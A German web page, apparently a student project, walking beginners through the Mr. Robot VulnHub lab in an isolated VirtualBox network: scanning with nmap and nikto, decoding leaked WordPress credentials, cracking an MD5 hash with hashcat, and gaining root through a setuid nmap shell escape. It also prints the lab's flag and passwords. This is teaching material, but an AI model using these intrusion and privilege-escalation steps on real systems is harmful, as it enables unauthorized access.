Credit Box
Pink Icon Erstellt mit <3 von Mattis & Baris
Animierte Headline
Revealed: Wie du jedes
System hackst

Nach einer Woche harter Arbeit sind wir stolz, die Ergebnisse unserer Forschung während der Wirtschaftswoche am MTG in München präsentieren zu können. Du willst Hacking zu lernen? Heute ist dein Tag.

Gradient Button
Gradient Button
Wichtig:
Bevor wir anfangen
Positive Verwendung

Ich werde diese Informationen nur
nutzen, um gutes anzurichten

Negative Verwendung

Ich werde diese Informationen nutzen
um illegale Dinge anzurichten

1. Kali Linux in VirtualBox sicher einrichten – Schritt für Schritt

1. Kali Linux und VirtualBox herunterladen
Lade dir VirtualBox für dein Betriebssystem (Windows, macOS oder Linux) herunter und installiere es:
👉 VirtualBox Download-Link

Lade dir das Kali Linux Image für VirtualBox herunter:
👉 Kali VM Download-Link

Entpacke das heruntergeladene Archiv, falls es als .zip oder .7z vorliegt.

2. Kali Linux VM in VirtualBox importieren
Starte VirtualBox.

Klicke auf das Plus-Symbol (+) oder wähle im Menü “Maschine” → “Hinzufügen”.

Navigiere zur entpackten .vbox- oder .ova-Datei von Kali Linux und füge sie hinzu.

Kali sollte nun in der Liste deiner VMs auftauchen – noch nicht starten!

3. Netzwerk sicher konfigurieren
Um deine VM von deinem Heimnetzwerk zu trennen, richte ein isoliertes Netzwerk ein:

Wähle die Kali-VM in VirtualBox mit einem Linksklick aus.

Klicke auf das Zahnradsymbol (Ändern) oder mache einen Rechtsklick → “Ändern”.

Gehe zum Tab „Netzwerk“.

Im Bereich „Angeschlossen an“:
Wähle „Internes Netzwerk“ aus dem Dropdown.

Im Feld „Name“ darunter:
Trage z. B. playground ein (frei wählbar, aber einprägsam).

Wiederhole diesen Vorgang für alle VMs, die du nutzen möchtest (z. B. Mr.Robot).

4. DHCP-Server für das virtuelle Netzwerk starten
Damit deine VMs automatisch IP-Adressen bekommen, musst du einen kleinen Server starten:

Unter Windows:
Öffne die Eingabeaufforderung (CMD) als Administrator.

Wechsle ins VirtualBox-Verzeichnis:

cmd
Kopieren
Bearbeiten
cd “\Program Files\Oracle\VirtualBox”
Starte den DHCP-Server:

cmd
Kopieren
Bearbeiten
vboxmanage dhcpserver add –network=playground –server-ip=10.10.1.1 –lower-ip=10.10.1.2 –upper-ip=10.10.1.20 –netmask=255.255.255.0 –enable
Unter Linux/macOS:
Einfach nur diesen Befehl im Terminal eingeben:

bash
Kopieren
Bearbeiten
vboxmanage dhcpserver add –network=playground –server-ip=10.10.1.1 –lower-ip=10.10.1.2 –upper-ip=10.10.1.20 –netmask=255.255.255.0 –enable
👉 Falls du einen anderen Netzwerknamen als playground gewählt hast, ersetze ihn im Befehl entsprechend.

5. VirtualBox neustarten (wenn nötig)
Starte VirtualBox neu, falls deine Änderungen nicht sofort greifen.

6. Kali Linux starten und Netzwerk prüfen
Starte die Kali-VM (Doppelklick).

Login:
Benutzername: kali
Passwort: kali

Öffne ein Terminal und gib ein:

bash
Kopieren
Bearbeiten
ifconfig
Prüfe, ob du eine IP aus dem Bereich 10.10.1.x hast (z. B. 10.10.1.2).

Teste mit:

bash
Kopieren
Bearbeiten
ping <dein Router-IP>
→ Es darf kein Zugriff auf dein Heimnetzwerk möglich sein.

7. Zweite Trainings-VM (z. B. Mr. Robot) hinzufügen
Füge die Mr.Robot VM genauso hinzu wie Kali.

Setze auch hier das Netzwerk auf „Internes Netzwerk“ mit dem gleichen Namen (playground).

Starte sie erst, wenn Kali korrekt isoliert läuft.

8. Optional: Tastaturlayout & Tools testen
Füge ein deutsches Tastaturlayout in Kali hinzu, wenn du magst.

Teste einige Tools gegen die zweite VM, z. B. einfache Scans.

Aber: Kein Spicken oder Googeln nach Lösungen. Du sollst verstehen, was du tust.

✅ Ziel erreicht!
Du hast jetzt:

Zwei isolierte VMs eingerichtet

Ein eigenes internes Netzwerk aufgesetzt

Einen eigenen DHCP-Server konfiguriert

💡 Das ist schon mehr als viele IT-Studenten in ihrer ersten Woche machen. 🔥

⚠️ Wichtiger Hinweis
Dieses Projekt dient nur dem Üben an eigenen VMs auf deinem eigenen Rechner.
Alle realen Angriffe oder Tests außerhalb deiner VMs sind strafbar!

2. Analyse & Angriffssimulation auf die Mr. Robot VM

Schritt 1: IP-Adresse des Ziels mit netdiscover herausfinden
Starte die Kali-VM und stelle auf deutsches Tastaturlayout um.

Öffne ein Terminal und gib folgenden Befehl ein:

bash
Kopieren
Bearbeiten
sudo netdiscover -r 10.10.1.0/24
Damit wird das gesamte Subnetz 10.10.1.x (also /24) gescannt.

Suche die IP der MrRobot-VM heraus (z. B. 10.10.1.3).

📡 Schritt 2: Zielsystem mit nmap scannen
Führe auf Kali den Basis-Scan aus:

bash
Kopieren
Bearbeiten
nmap 10.10.1.3
Lies die offenen Ports ab – z. B.:

22 (SSH)

80 (HTTP)

443 (HTTPS)

🧠 Aufgabe 1:
Welcher ist der dritte Port und welcher Dienst steckt dahinter?

🧠 Aufgabe 2:
Welche Option macht den Scan unauffälliger?
👉 Tipp: Lies in der nmap-Doku unter „port scanning techniques“ nach (z. B. -sS, -T2 oder –scan-delay).

🧭 Schritt 3: Erweiterter Webserver-Scan mit nmap –script=http-enum
Führe den erweiterten Scan mit integriertem Skript aus:

bash
Kopieren
Bearbeiten
nmap 10.10.1.3 –script=http-enum
Du bekommst jetzt versteckte Pfade wie:

/admin/

/wp-login.php

/readme.html

/feed/ (inkl. WordPress-Version!)

💬 Das zeigt, wie schlecht abgesichert diese alte WordPress-Installation ist!

🛠 Schritt 4: Alternativer Scan mit nikto
Nikto scannt Webserver auf Sicherheitslücken:

bash
Kopieren
Bearbeiten
nikto -host 10.10.1.3
Lies die Ausgaben wie:

Fehlende Header (X-XSS-Protection, X-Content-Type)

Alte WordPress-Versionen

Sensible Pfade wie /admin/, /license.txt

📄 Schritt 5: Dateien gezielt mit wget herunterladen
Lade bestimmte Dateien mit dem Tool wget:

bash
Kopieren
Bearbeiten
wget http://10.10.1.3/readme.html
wget http://10.10.1.3/license.txt
wget http://10.10.1.3/robots.txt
Zeige den Inhalt z. B. mit:

bash
Kopieren
Bearbeiten
cat robots.txt
→ Enthält spannende Hinweise auf weitere Dateien!

🔎 Schritt 6: Versteckte Dateien analysieren
In robots.txt finden wir z. B.:

txt
Kopieren
Bearbeiten
User-agent: *
fsocity.dic
key-1-of-3.txt
Lade diese mit:

bash
Kopieren
Bearbeiten
wget http://10.10.1.3/fsocity.dic
wget http://10.10.1.3/key-1-of-3.txt
fsocity.dic → Wahrscheinlich ein Wörterbuch für Bruteforce-Attacken

key-1-of-3.txt → enthält:

Kopieren
Bearbeiten
073403c8a58a1f80d943455fb30724b9
📬 Schritt 7: Verdächtige Strings analysieren (Base64-Decoding)
In license.txt findest du z. B.:

makefile
Kopieren
Bearbeiten
ZWxsaW90OkVSMjgtMDY1Mgo=
Decodiere mit:

bash
Kopieren
Bearbeiten
echo ‘ZWxsaW90OkVSMjgtMDY1Mgo=’ | base64 –decode
→ Output:

makefile
Kopieren
Bearbeiten
elliot:ER28-0652
🔐 Schritt 8: Login versuchen
Besuche im Browser:

arduino
Kopieren
Bearbeiten
http://10.10.1.3/wp-login.php
Versuche den Login mit:

Benutzer: elliot

Passwort: ER28-0652

🧠 Aufgabe 5:
Hat der Login geklappt?

🔐 Schritt 9: Fazit zu Sicherheit & Verantwortung
🧠 Aufgabe 6:
Wie kann man verhindern, dass sensible Dateien wie robots.txt, readme.html oder license.txt ausgelesen werden?

Antwort:
👉 Niemals sensible Daten im öffentlich zugänglichen Webroot speichern!
👉 Schütze Verzeichnisse mit .htaccess-Dateien oder setze saubere Rechte & Firewall-Regeln!

3. Von „robot“ zu „root“ – Wie man sich durch ein System arbeitet

Erkundung des Zielsystems
Nach dem Einstieg über die Webshell schauen wir uns auf dem Zielsystem um. Im Benutzerverzeichnis /home/robot stoßen wir auf zwei Dateien:

bash
Kopieren
Bearbeiten
ls -la /home/robot
Ergebnis:

key-2-of-3.txt – leider nur vom Nutzer robot lesbar

password.raw-md5 – enthält einen Hash, der uns weiterhelfen könnte

🔎 Schritt 1: MD5-Hash identifizieren und vorbereiten
Öffne die Datei:

bash
Kopieren
Bearbeiten
cat password.raw-md5
→ Inhalt: robot:c3fcd3d76192e4007dfb496cca67e13b

Kopiere den Hash auf deinen Kali-Rechner:

bash
Kopieren
Bearbeiten
echo ‘c3fcd3d76192e4007dfb496cca67e13b’ > hash
🧠 Schritt 2: Passwort knacken mit Hashcat
Anstatt jeden möglichen Wert zu erraten („brute force“), greifen wir auf ein bekanntes Wörterbuch zurück.

Entpacke die Passwortliste:

bash
Kopieren
Bearbeiten
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
Starte den Cracker:

bash
Kopieren
Bearbeiten
hashcat -m 0 -a 0 hash rockyou.txt -O
Wenn alles funktioniert, wird das Passwort sichtbar:

text
Kopieren
Bearbeiten
c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz
🤯 Das Passwort bestand einfach aus allen Kleinbuchstaben – nicht sicher, obwohl lang.

👤 Schritt 3: Benutzerwechsel zu robot
Nun, da wir das Passwort kennen, wechseln wir den Benutzer:

bash
Kopieren
Bearbeiten
su robot
Password: abcdefghijklmnopqrstuvwxyz
Bingo – wir sind jetzt robot!

📌 Schritt 4: Auf der Suche nach Programmen mit erhöhten Rechten
Um als nächstes an root-Rechte zu kommen, suchen wir nach Programmen, die mit dem sog. setuid-Bit ausgestattet sind – sie werden stets mit den Rechten ihres Eigentümers ausgeführt.

bash
Kopieren
Bearbeiten
find / -perm /6000 2>/dev/null
Unter den Ergebnissen: nmap.

🧪 Schritt 5: Nmap interaktiv als Einstieg nutzen
Einige Versionen von nmap bieten einen interaktiven Modus, über den wir sogar Shell-Befehle absetzen können.

Starte Nmap interaktiv:

bash
Kopieren
Bearbeiten
nmap –interactive
Gib h ein für Hilfe – dort steht unter anderem:

text
Kopieren
Bearbeiten
! <command> — runs shell command given in the foreground
Versuche eine Shell zu starten:

bash
Kopieren
Bearbeiten
!sh
Teste deine Rechte:

bash
Kopieren
Bearbeiten
whoami
Ergebnis:

text
Kopieren
Bearbeiten
root
🔥 Wir haben das System vollständig übernommen!

🧠 Reflektionsaufgaben
🔍 Analyse
Welche Sicherheitslücken haben diesen Angriff ermöglicht?

Fehlende Passwortsicherheit (leicht knackbarer MD5-Hash)

Keine Zugriffsbeschränkung auf gefährliche Tools wie Nmap

Alte Versionen von Programmen ohne Schutzmechanismen

Kein Monitoring verdächtiger Aktivitäten

Wie kann man sich schützen?

Sichere Passwörter & Passwort-Hashing mit Salt + modernen Algorithmen

Nur root darf sicherheitskritische Tools verwenden

Datei- und Benutzerrechte richtig konfigurieren

Angriffsfläche durch veraltete Software minimieren

🏹 Bonus: Nächste Herausforderung
🔗 Teste dein neues Wissen mit dieser VM von VulnHub:
👉 Hackfest2016: Quaoar

Diese VM wurde speziell für Anfänger entworfen. Der Weg zum Erfolg ist ähnlich – du brauchst keine neuen Tools, aber ein gutes Auge für Hinweise.

Credit Box
Pink Icon Persönliche 1-zu-1 Beratung
Zu kompliziert?

Jetzt eintragen und persönliches 1-to-1 Coaching von Profis erhalten, um deine Fähigkeiten schnell und effizient ontop zu bringen.

Please enable JavaScript in your browser to complete this form.
Scroll to Top